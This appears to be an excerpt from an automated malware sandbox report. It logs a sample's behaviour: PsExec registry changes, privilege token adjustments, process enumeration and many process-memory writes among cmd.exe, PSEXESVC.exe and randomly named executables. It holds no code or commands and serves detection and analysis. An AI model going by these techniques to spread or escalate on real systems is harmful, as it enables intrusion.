Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec	_fif.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"	_fif.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec	_fif.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec	_fif.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec	_fif.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec	_fif.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"	_fif.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"	_fif.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec	_fif.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"	_fif.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec	_fif.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec	_fif.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"	_fif.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"	_fif.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec	_fif.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"	_fif.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"	_fif.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec	_fif.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec	_fif.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"	_fif.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"	_fif.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec	_fif.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec	_fif.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"	_fif.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec	_fif.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"	_fif.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec	_fif.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"	_fif.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec	_fif.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"	_fif.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"	_fif.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec	_fif.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec	_fif.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"	_fif.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"	_fif.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"	_fif.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec	_fif.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec	_fif.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"	_fif.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec	_fif.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec	_fif.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"	_fif.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"	_fif.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"	_fif.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"	_fif.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"	_fif.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"	_fif.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"	_fif.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec	_fif.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"	_fif.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec	_fif.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"	_fif.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"	_fif.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec	_fif.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec	_fif.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec	_fif.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec	_fif.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"	_fif.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"	_fif.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"	_fif.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec	_fif.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec	_fif.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec	_fif.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"	_fif.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"	_fif.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec	_fif.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec	_fif.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec	_fif.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"	_fif.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"	_fif.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec	_fif.exe

Suspicious behavior: EnumeratesProcesses 6 IoCs

pid	Process
412	vfrkl.exe
412	vfrkl.exe
412	vfrkl.exe
412	vfrkl.exe
412	vfrkl.exe
412	vfrkl.exe

Suspicious use of AdjustPrivilegeToken 84 IoCs

description	pid	Process
Token: SeAssignPrimaryTokenPrivilege	1740	_ftf.exe
Token: SeIncreaseQuotaPrivilege	1740	_ftf.exe
Token: SeSecurityPrivilege	1740	_ftf.exe
Token: SeTakeOwnershipPrivilege	1740	_ftf.exe
Token: SeLoadDriverPrivilege	1740	_ftf.exe
Token: SeSystemtimePrivilege	1740	_ftf.exe
Token: SeBackupPrivilege	1740	_ftf.exe
Token: SeRestorePrivilege	1740	_ftf.exe
Token: SeShutdownPrivilege	1740	_ftf.exe
Token: SeSystemEnvironmentPrivilege	1740	_ftf.exe
Token: SeUndockPrivilege	1740	_ftf.exe
Token: SeManageVolumePrivilege	1740	_ftf.exe
Token: SeDebugPrivilege	412	vfrkl.exe
Token: SeShutdownPrivilege	3428	_umx.exe
Token: SeBackupPrivilege	612	vssvc.exe
Token: SeRestorePrivilege	612	vssvc.exe
Token: SeAuditPrivilege	612	vssvc.exe
Token: SeAssignPrimaryTokenPrivilege	1892	_ple.exe
Token: SeIncreaseQuotaPrivilege	1892	_ple.exe
Token: SeSecurityPrivilege	1892	_ple.exe
Token: SeTakeOwnershipPrivilege	1892	_ple.exe
Token: SeLoadDriverPrivilege	1892	_ple.exe
Token: SeSystemtimePrivilege	1892	_ple.exe
Token: SeBackupPrivilege	1892	_ple.exe
Token: SeRestorePrivilege	1892	_ple.exe
Token: SeShutdownPrivilege	1892	_ple.exe
Token: SeSystemEnvironmentPrivilege	1892	_ple.exe
Token: SeUndockPrivilege	1892	_ple.exe
Token: SeManageVolumePrivilege	1892	_ple.exe
Token: SeBackupPrivilege	264	wbengine.exe
Token: SeRestorePrivilege	264	wbengine.exe
Token: SeSecurityPrivilege	264	wbengine.exe
Token: SeAssignPrimaryTokenPrivilege	188	_ple.exe
Token: SeIncreaseQuotaPrivilege	188	_ple.exe
Token: SeSecurityPrivilege	188	_ple.exe
Token: SeTakeOwnershipPrivilege	188	_ple.exe
Token: SeLoadDriverPrivilege	188	_ple.exe
Token: SeSystemtimePrivilege	188	_ple.exe
Token: SeBackupPrivilege	188	_ple.exe
Token: SeRestorePrivilege	188	_ple.exe
Token: SeShutdownPrivilege	188	_ple.exe
Token: SeSystemEnvironmentPrivilege	188	_ple.exe
Token: SeUndockPrivilege	188	_ple.exe
Token: SeManageVolumePrivilege	188	_ple.exe
Token: SeSecurityPrivilege	4220	_fif.exe
Token: SeBackupPrivilege	4220	_fif.exe
Token: SeAssignPrimaryTokenPrivilege	4344	_ple.exe
Token: SeIncreaseQuotaPrivilege	4344	_ple.exe
Token: SeSecurityPrivilege	4344	_ple.exe
Token: SeTakeOwnershipPrivilege	4344	_ple.exe
Token: SeLoadDriverPrivilege	4344	_ple.exe
Token: SeSystemtimePrivilege	4344	_ple.exe
Token: SeBackupPrivilege	4344	_ple.exe
Token: SeRestorePrivilege	4344	_ple.exe
Token: SeShutdownPrivilege	4344	_ple.exe
Token: SeSystemEnvironmentPrivilege	4344	_ple.exe
Token: SeUndockPrivilege	4344	_ple.exe
Token: SeManageVolumePrivilege	4344	_ple.exe
Token: SeSecurityPrivilege	4664	wevtutil.exe
Token: SeBackupPrivilege	4664	wevtutil.exe
Token: SeAssignPrimaryTokenPrivilege	4840	_ple.exe
Token: SeIncreaseQuotaPrivilege	4840	_ple.exe
Token: SeSecurityPrivilege	4840	_ple.exe
Token: SeTakeOwnershipPrivilege	4840	_ple.exe
Token: SeLoadDriverPrivilege	4840	_ple.exe
Token: SeSystemtimePrivilege	4840	_ple.exe
Token: SeBackupPrivilege	4840	_ple.exe
Token: SeRestorePrivilege	4840	_ple.exe
Token: SeShutdownPrivilege	4840	_ple.exe
Token: SeSystemEnvironmentPrivilege	4840	_ple.exe
Token: SeUndockPrivilege	4840	_ple.exe
Token: SeManageVolumePrivilege	4840	_ple.exe
Token: SeAssignPrimaryTokenPrivilege	5116	_ple.exe
Token: SeIncreaseQuotaPrivilege	5116	_ple.exe
Token: SeSecurityPrivilege	5116	_ple.exe
Token: SeTakeOwnershipPrivilege	5116	_ple.exe
Token: SeLoadDriverPrivilege	5116	_ple.exe
Token: SeSystemtimePrivilege	5116	_ple.exe
Token: SeBackupPrivilege	5116	_ple.exe
Token: SeRestorePrivilege	5116	_ple.exe
Token: SeShutdownPrivilege	5116	_ple.exe
Token: SeSystemEnvironmentPrivilege	5116	_ple.exe
Token: SeUndockPrivilege	5116	_ple.exe
Token: SeManageVolumePrivilege	5116	_ple.exe

Suspicious use of WriteProcessMemory 519 IoCs

description	pid	Process	procid_target
PID 1108 wrote to memory of 4004	1108	cmd.exe	74
PID 1108 wrote to memory of 4004	1108	cmd.exe	74
PID 4004 wrote to memory of 3988	4004	cmd.exe	76
PID 4004 wrote to memory of 3988	4004	cmd.exe	76
PID 4004 wrote to memory of 3288	4004	cmd.exe	77
PID 4004 wrote to memory of 3288	4004	cmd.exe	77
PID 4004 wrote to memory of 3208	4004	cmd.exe	78
PID 4004 wrote to memory of 3208	4004	cmd.exe	78
PID 1352 wrote to memory of 1740	1352	PSEXESVC.exe	85
PID 1352 wrote to memory of 1740	1352	PSEXESVC.exe	85
PID 1352 wrote to memory of 1740	1352	PSEXESVC.exe	85
PID 1740 wrote to memory of 412	1740	_ftf.exe	86
PID 1740 wrote to memory of 412	1740	_ftf.exe	86
PID 1740 wrote to memory of 3428	1740	_ftf.exe	87
PID 1740 wrote to memory of 3428	1740	_ftf.exe	87
PID 1740 wrote to memory of 3428	1740	_ftf.exe	87
PID 3428 wrote to memory of 3980	3428	_umx.exe	88
PID 3428 wrote to memory of 3980	3428	_umx.exe	88
PID 1740 wrote to memory of 4088	1740	_ftf.exe	90
PID 1740 wrote to memory of 4088	1740	_ftf.exe	90
PID 1740 wrote to memory of 4088	1740	_ftf.exe	90
PID 1740 wrote to memory of 2600	1740	_ftf.exe	91
PID 1740 wrote to memory of 2600	1740	_ftf.exe	91
PID 1740 wrote to memory of 2600	1740	_ftf.exe	91
PID 1740 wrote to memory of 3908	1740	_ftf.exe	92
PID 1740 wrote to memory of 3908	1740	_ftf.exe	92
PID 1740 wrote to memory of 3908	1740	_ftf.exe	92
PID 3980 wrote to memory of 4000	3980	cmd.exe	93
PID 3980 wrote to memory of 4000	3980	cmd.exe	93
PID 1740 wrote to memory of 3060	1740	_ftf.exe	96
PID 1740 wrote to memory of 3060	1740	_ftf.exe	96
PID 1740 wrote to memory of 3060	1740	_ftf.exe	96
PID 3428 wrote to memory of 2164	3428	_umx.exe	102
PID 3428 wrote to memory of 2164	3428	_umx.exe	102
PID 1740 wrote to memory of 2672	1740	_ftf.exe	106
PID 2164 wrote to memory of 3568	2164	cmd.exe	105
PID 2164 wrote to memory of 3568	2164	cmd.exe	105
PID 1856 wrote to memory of 1892	1856	PSEXESVC.exe	104
PID 1856 wrote to memory of 1892	1856	PSEXESVC.exe	104
PID 1856 wrote to memory of 1892	1856	PSEXESVC.exe	104
PID 1740 wrote to memory of 2672	1740	_ftf.exe	106
PID 1740 wrote to memory of 2672	1740	_ftf.exe	106
PID 1892 wrote to memory of 2872	1892	_ple.exe	107
PID 1892 wrote to memory of 2872	1892	_ple.exe	107
PID 1892 wrote to memory of 2872	1892	_ple.exe	107
PID 1892 wrote to memory of 2872	1892	_ple.exe	107
PID 1892 wrote to memory of 2872	1892	_ple.exe	107
PID 1740 wrote to memory of 3212	1740	_ftf.exe	110
PID 1740 wrote to memory of 3212	1740	_ftf.exe	110
PID 1740 wrote to memory of 3212	1740	_ftf.exe	110
PID 1740 wrote to memory of 3236	1740	_ftf.exe	108
PID 1740 wrote to memory of 3236	1740	_ftf.exe	108
PID 1740 wrote to memory of 3236	1740	_ftf.exe	108
PID 1740 wrote to memory of 1516	1740	_ftf.exe	114
PID 1740 wrote to memory of 1516	1740	_ftf.exe	114
PID 1740 wrote to memory of 1516	1740	_ftf.exe	114
PID 1740 wrote to memory of 2632	1740	_ftf.exe	118
PID 1740 wrote to memory of 2632	1740	_ftf.exe	118
PID 1740 wrote to memory of 2632	1740	_ftf.exe	118
PID 1740 wrote to memory of 3120	1740	_ftf.exe	119
PID 1740 wrote to memory of 3120	1740	_ftf.exe	119
PID 1740 wrote to memory of 3120	1740	_ftf.exe	119
PID 1740 wrote to memory of 892	1740	_ftf.exe	122
PID 1740 wrote to memory of 892	1740	_ftf.exe	122
PID 1740 wrote to memory of 892	1740	_ftf.exe	122
PID 1740 wrote to memory of 496	1740	_ftf.exe	123
PID 1740 wrote to memory of 496	1740	_ftf.exe	123
PID 1740 wrote to memory of 496	1740	_ftf.exe	123
PID 3428 wrote to memory of 3732	3428	_umx.exe	124
PID 3428 wrote to memory of 3732	3428	_umx.exe	124
PID 1740 wrote to memory of 1860	1740	_ftf.exe	128
PID 1740 wrote to memory of 1860	1740	_ftf.exe	128
PID 1740 wrote to memory of 1860	1740	_ftf.exe	128
PID 1740 wrote to memory of 1940	1740	_ftf.exe	129
PID 1740 wrote to memory of 1940	1740	_ftf.exe	129
PID 1740 wrote to memory of 1940	1740	_ftf.exe	129
PID 3732 wrote to memory of 3820	3732	cmd.exe	130
PID 3732 wrote to memory of 3820	3732	cmd.exe	130
PID 1856 wrote to memory of 188	1856	PSEXESVC.exe	131
PID 1856 wrote to memory of 188	1856	PSEXESVC.exe	131
PID 1856 wrote to memory of 188	1856	PSEXESVC.exe	131
PID 3732 wrote to memory of 252	3732	cmd.exe	133
PID 3732 wrote to memory of 252	3732	cmd.exe	133
PID 188 wrote to memory of 2080	188	_ple.exe	132
PID 188 wrote to memory of 2080	188	_ple.exe	132
PID 188 wrote to memory of 2080	188	_ple.exe	132
PID 188 wrote to memory of 2080	188	_ple.exe	132
PID 188 wrote to memory of 2080	188	_ple.exe	132
PID 1740 wrote to memory of 2340	1740	_ftf.exe	136
PID 1740 wrote to memory of 2340	1740	_ftf.exe	136
PID 1740 wrote to memory of 2340	1740	_ftf.exe	136
PID 3428 wrote to memory of 4116	3428	_umx.exe	278
PID 3428 wrote to memory of 4116	3428	_umx.exe	278
PID 1740 wrote to memory of 4196	1740	_ftf.exe	140
PID 1740 wrote to memory of 4196	1740	_ftf.exe	140
PID 1740 wrote to memory of 4196	1740	_ftf.exe	140
PID 1740 wrote to memory of 4208	1740	_ftf.exe	141
PID 1740 wrote to memory of 4208	1740	_ftf.exe	141
PID 1740 wrote to memory of 4208	1740	_ftf.exe	141
PID 4116 wrote to memory of 4220	4116	Conhost.exe	271
PID 4116 wrote to memory of 4220	4116	Conhost.exe	271
PID 1740 wrote to memory of 4332	1740	_ftf.exe	146
PID 1740 wrote to memory of 4332	1740	_ftf.exe	146
PID 1740 wrote to memory of 4332	1740	_ftf.exe	146
PID 1856 wrote to memory of 4344	1856	PSEXESVC.exe	145
PID 1856 wrote to memory of 4344	1856	PSEXESVC.exe	145
PID 1856 wrote to memory of 4344	1856	PSEXESVC.exe	145
PID 4344 wrote to memory of 4364	4344	_ple.exe	147
PID 4344 wrote to memory of 4364	4344	_ple.exe	147
PID 4344 wrote to memory of 4364	4344	_ple.exe	147
PID 4344 wrote to memory of 4364	4344	_ple.exe	147
PID 4344 wrote to memory of 4364	4344	_ple.exe	147
PID 1740 wrote to memory of 4384	1740	_ftf.exe	148
PID 1740 wrote to memory of 4384	1740	_ftf.exe	148
PID 1740 wrote to memory of 4384	1740	_ftf.exe	148
PID 1740 wrote to memory of 4424	1740	_ftf.exe	149
PID 1740 wrote to memory of 4424	1740	_ftf.exe	149
PID 1740 wrote to memory of 4424	1740	_ftf.exe	149
PID 3428 wrote to memory of 4448	3428	_umx.exe	150
PID 3428 wrote to memory of 4448	3428	_umx.exe	150
PID 1740 wrote to memory of 4536	1740	_ftf.exe	154
PID 1740 wrote to memory of 4536	1740	_ftf.exe	154
PID 1740 wrote to memory of 4536	1740	_ftf.exe	154
PID 1740 wrote to memory of 4604	1740	_ftf.exe	156
PID 1740 wrote to memory of 4604	1740	_ftf.exe	156
PID 1740 wrote to memory of 4604	1740	_ftf.exe	156
PID 4448 wrote to memory of 4664	4448	cmd.exe	159
PID 4448 wrote to memory of 4664	4448	cmd.exe	159
PID 1740 wrote to memory of 4716	1740	_ftf.exe	160
PID 1740 wrote to memory of 4716	1740	_ftf.exe	160
PID 1740 wrote to memory of 4716	1740	_ftf.exe	160
PID 1740 wrote to memory of 4728	1740	_ftf.exe	161
PID 1740 wrote to memory of 4728	1740	_ftf.exe	161
PID 1740 wrote to memory of 4728	1740	_ftf.exe	161
PID 1740 wrote to memory of 4816	1740	_ftf.exe	164
PID 1740 wrote to memory of 4816	1740	_ftf.exe	164
PID 1740 wrote to memory of 4816	1740	_ftf.exe	164
PID 1740 wrote to memory of 4828	1740	_ftf.exe	165
PID 1740 wrote to memory of 4828	1740	_ftf.exe	165
PID 1740 wrote to memory of 4828	1740	_ftf.exe	165
PID 1856 wrote to memory of 4840	1856	PSEXESVC.exe	166
PID 1856 wrote to memory of 4840	1856	PSEXESVC.exe	166
PID 1856 wrote to memory of 4840	1856	PSEXESVC.exe	166
PID 4840 wrote to memory of 4864	4840	_ple.exe	167
PID 4840 wrote to memory of 4864	4840	_ple.exe	167
PID 4840 wrote to memory of 4864	4840	_ple.exe	167
PID 4840 wrote to memory of 4864	4840	_ple.exe	167
PID 4840 wrote to memory of 4864	4840	_ple.exe	167
PID 1740 wrote to memory of 4908	1740	_ftf.exe	170
PID 1740 wrote to memory of 4908	1740	_ftf.exe	170
PID 1740 wrote to memory of 4908	1740	_ftf.exe	170
PID 1740 wrote to memory of 5024	1740	_ftf.exe	172
PID 1740 wrote to memory of 5024	1740	_ftf.exe	172
PID 1740 wrote to memory of 5024	1740	_ftf.exe	172
PID 1740 wrote to memory of 5072	1740	_ftf.exe	174
PID 1740 wrote to memory of 5072	1740	_ftf.exe	174
PID 1740 wrote to memory of 5072	1740	_ftf.exe	174
PID 1856 wrote to memory of 5116	1856	PSEXESVC.exe	176
PID 1856 wrote to memory of 5116	1856	PSEXESVC.exe	176
PID 1856 wrote to memory of 5116	1856	PSEXESVC.exe	176
PID 5116 wrote to memory of 3924	5116	_ple.exe	177
PID 5116 wrote to memory of 3924	5116	_ple.exe	177
PID 5116 wrote to memory of 3924	5116	_ple.exe	177
PID 5116 wrote to memory of 3924	5116	_ple.exe	177
PID 5116 wrote to memory of 3924	5116	_ple.exe	177
PID 1740 wrote to memory of 2916	1740	_ftf.exe	179
PID 1740 wrote to memory of 2916	1740	_ftf.exe	179
PID 1740 wrote to memory of 1032	1740	_ftf.exe	178
PID 1740 wrote to memory of 2916	1740	_ftf.exe	179
PID 1740 wrote to memory of 1032	1740	_ftf.exe	178
PID 1740 wrote to memory of 1032	1740	_ftf.exe	178
PID 1740 wrote to memory of 1888	1740	_ftf.exe	180
PID 1740 wrote to memory of 1888	1740	_ftf.exe	180
PID 1740 wrote to memory of 1888	1740	_ftf.exe	180
PID 1740 wrote to memory of 4152	1740	_ftf.exe	181
PID 1740 wrote to memory of 4152	1740	_ftf.exe	181
PID 1740 wrote to memory of 4152	1740	_ftf.exe	181
PID 1740 wrote to memory of 4308	1740	_ftf.exe	188
PID 1740 wrote to memory of 4308	1740	_ftf.exe	188
PID 1740 wrote to memory of 4308	1740	_ftf.exe	188
PID 1740 wrote to memory of 4212	1740	_ftf.exe	186
PID 1740 wrote to memory of 4212	1740	_ftf.exe	186
PID 1740 wrote to memory of 4212	1740	_ftf.exe	186
PID 1740 wrote to memory of 4300	1740	_ftf.exe	187
PID 1740 wrote to memory of 4300	1740	_ftf.exe	187
PID 1740 wrote to memory of 4300	1740	_ftf.exe	187
PID 1740 wrote to memory of 4056	1740	_ftf.exe	192
PID 1740 wrote to memory of 4056	1740	_ftf.exe	192
PID 1740 wrote to memory of 4056	1740	_ftf.exe	192
PID 1740 wrote to memory of 4176	1740	_ftf.exe	193
PID 1740 wrote to memory of 4176	1740	_ftf.exe	193
PID 1740 wrote to memory of 4176	1740	_ftf.exe	193
PID 1740 wrote to memory of 4360	1740	_ftf.exe	194
PID 1740 wrote to memory of 4360	1740	_ftf.exe	194
PID 1740 wrote to memory of 4360	1740	_ftf.exe	194
PID 1740 wrote to memory of 4440	1740	_ftf.exe	198
PID 1740 wrote to memory of 4440	1740	_ftf.exe	198
PID 1740 wrote to memory of 4440	1740	_ftf.exe	198
PID 1740 wrote to memory of 4504	1740	_ftf.exe	199
PID 1740 wrote to memory of 4504	1740	_ftf.exe	199
PID 1740 wrote to memory of 4504	1740	_ftf.exe	199
PID 1740 wrote to memory of 4596	1740	_ftf.exe	200
PID 1740 wrote to memory of 4596	1740	_ftf.exe	200
PID 1740 wrote to memory of 4596	1740	_ftf.exe	200
PID 1740 wrote to memory of 4680	1740	_ftf.exe	204
PID 1740 wrote to memory of 4680	1740	_ftf.exe	204
PID 1740 wrote to memory of 4680	1740	_ftf.exe	204
PID 1740 wrote to memory of 4660	1740	_ftf.exe	206
PID 1740 wrote to memory of 4660	1740	_ftf.exe	206
PID 1740 wrote to memory of 4660	1740	_ftf.exe	206
PID 1740 wrote to memory of 4784	1740	_ftf.exe	207
PID 1740 wrote to memory of 4784	1740	_ftf.exe	207
PID 1740 wrote to memory of 4784	1740	_ftf.exe	207
PID 1740 wrote to memory of 4760	1740	_ftf.exe	210
PID 1740 wrote to memory of 4760	1740	_ftf.exe	210
PID 1740 wrote to memory of 4760	1740	_ftf.exe	210
PID 1740 wrote to memory of 4636	1740	_ftf.exe	211
PID 1740 wrote to memory of 4636	1740	_ftf.exe	211
PID 1740 wrote to memory of 4636	1740	_ftf.exe	211
PID 1740 wrote to memory of 4856	1740	_ftf.exe	214
PID 1740 wrote to memory of 4856	1740	_ftf.exe	214
PID 1740 wrote to memory of 4856	1740	_ftf.exe	214
PID 1740 wrote to memory of 4820	1740	_ftf.exe	216
PID 1740 wrote to memory of 4820	1740	_ftf.exe	216
PID 1740 wrote to memory of 4820	1740	_ftf.exe	216
PID 1740 wrote to memory of 4996	1740	_ftf.exe	217
PID 1740 wrote to memory of 4996	1740	_ftf.exe	217
PID 1740 wrote to memory of 4996	1740	_ftf.exe	217
PID 1740 wrote to memory of 5052	1740	_ftf.exe	220
PID 1740 wrote to memory of 5052	1740	_ftf.exe	220
PID 1740 wrote to memory of 5052	1740	_ftf.exe	220
PID 1740 wrote to memory of 1196	1740	_ftf.exe	221
PID 1740 wrote to memory of 1196	1740	_ftf.exe	221
PID 1740 wrote to memory of 1196	1740	_ftf.exe	221
PID 1740 wrote to memory of 5104	1740	_ftf.exe	223
PID 1740 wrote to memory of 5104	1740	_ftf.exe	223
PID 1740 wrote to memory of 5104	1740	_ftf.exe	223
PID 1740 wrote to memory of 3796	1740	_ftf.exe	226
PID 1740 wrote to memory of 3796	1740	_ftf.exe	226
PID 1740 wrote to memory of 3796	1740	_ftf.exe	226
PID 1740 wrote to memory of 4320	1740	_ftf.exe	228
PID 1740 wrote to memory of 4320	1740	_ftf.exe	228
PID 1740 wrote to memory of 4320	1740	_ftf.exe	228
PID 1740 wrote to memory of 4160	1740	_ftf.exe	230
PID 1740 wrote to memory of 4160	1740	_ftf.exe	230
PID 1740 wrote to memory of 4160	1740	_ftf.exe	230
PID 1740 wrote to memory of 4200	1740	_ftf.exe	231
PID 1740 wrote to memory of 4200	1740	_ftf.exe	231
PID 1740 wrote to memory of 4200	1740	_ftf.exe	231
PID 1740 wrote to memory of 1736	1740	_ftf.exe	234
PID 1740 wrote to memory of 1736	1740	_ftf.exe	234
PID 1740 wrote to memory of 1736	1740	_ftf.exe	234
PID 1740 wrote to memory of 4260	1740	_ftf.exe	233
PID 1740 wrote to memory of 4260	1740	_ftf.exe	233
PID 1740 wrote to memory of 4260	1740	_ftf.exe	233
PID 1740 wrote to memory of 4268	1740	_ftf.exe	235
PID 1740 wrote to memory of 4268	1740	_ftf.exe	235
PID 1740 wrote to memory of 4268	1740	_ftf.exe	235
PID 1740 wrote to memory of 4164	1740	_ftf.exe	240
PID 1740 wrote to memory of 4164	1740	_ftf.exe	240
PID 1740 wrote to memory of 4164	1740	_ftf.exe	240
PID 1740 wrote to memory of 4400	1740	_ftf.exe	241
PID 1740 wrote to memory of 4400	1740	_ftf.exe	241
PID 1740 wrote to memory of 4400	1740	_ftf.exe	241
PID 1740 wrote to memory of 4688	1740	_ftf.exe	244
PID 1740 wrote to memory of 4688	1740	_ftf.exe	244
PID 1740 wrote to memory of 4688	1740	_ftf.exe	244
PID 1740 wrote to memory of 4532	1740	_ftf.exe	246
PID 1740 wrote to memory of 4532	1740	_ftf.exe	246
PID 1740 wrote to memory of 4532	1740	_ftf.exe	246
PID 1740 wrote to memory of 4488	1740	_ftf.exe	248
PID 1740 wrote to memory of 4488	1740	_ftf.exe	248
PID 1740 wrote to memory of 4488	1740	_ftf.exe	248
PID 1740 wrote to memory of 4812	1740	_ftf.exe	251
PID 1740 wrote to memory of 4812	1740	_ftf.exe	251
PID 1740 wrote to memory of 4812	1740	_ftf.exe	251
PID 1740 wrote to memory of 4736	1740	_ftf.exe	250
PID 1740 wrote to memory of 4736	1740	_ftf.exe	250
PID 1740 wrote to memory of 4736	1740	_ftf.exe	250
PID 1740 wrote to memory of 3216	1740	_ftf.exe	254
PID 1740 wrote to memory of 3216	1740	_ftf.exe	254
PID 1740 wrote to memory of 3216	1740	_ftf.exe	254
PID 1740 wrote to memory of 4872	1740	_ftf.exe	255
PID 1740 wrote to memory of 4872	1740	_ftf.exe	255
PID 1740 wrote to memory of 4872	1740	_ftf.exe	255
PID 1740 wrote to memory of 4964	1740	_ftf.exe	258
PID 1740 wrote to memory of 4964	1740	_ftf.exe	258
PID 1740 wrote to memory of 4964	1740	_ftf.exe	258
PID 1740 wrote to memory of 4836	1740	_ftf.exe	260
PID 1740 wrote to memory of 4836	1740	_ftf.exe	260
PID 1740 wrote to memory of 4836	1740	_ftf.exe	260
PID 1740 wrote to memory of 5040	1740	_ftf.exe	262
PID 1740 wrote to memory of 5040	1740	_ftf.exe	262
PID 1740 wrote to memory of 5040	1740	_ftf.exe	262
PID 1740 wrote to memory of 4264	1740	_ftf.exe	264
PID 1740 wrote to memory of 4264	1740	_ftf.exe	264
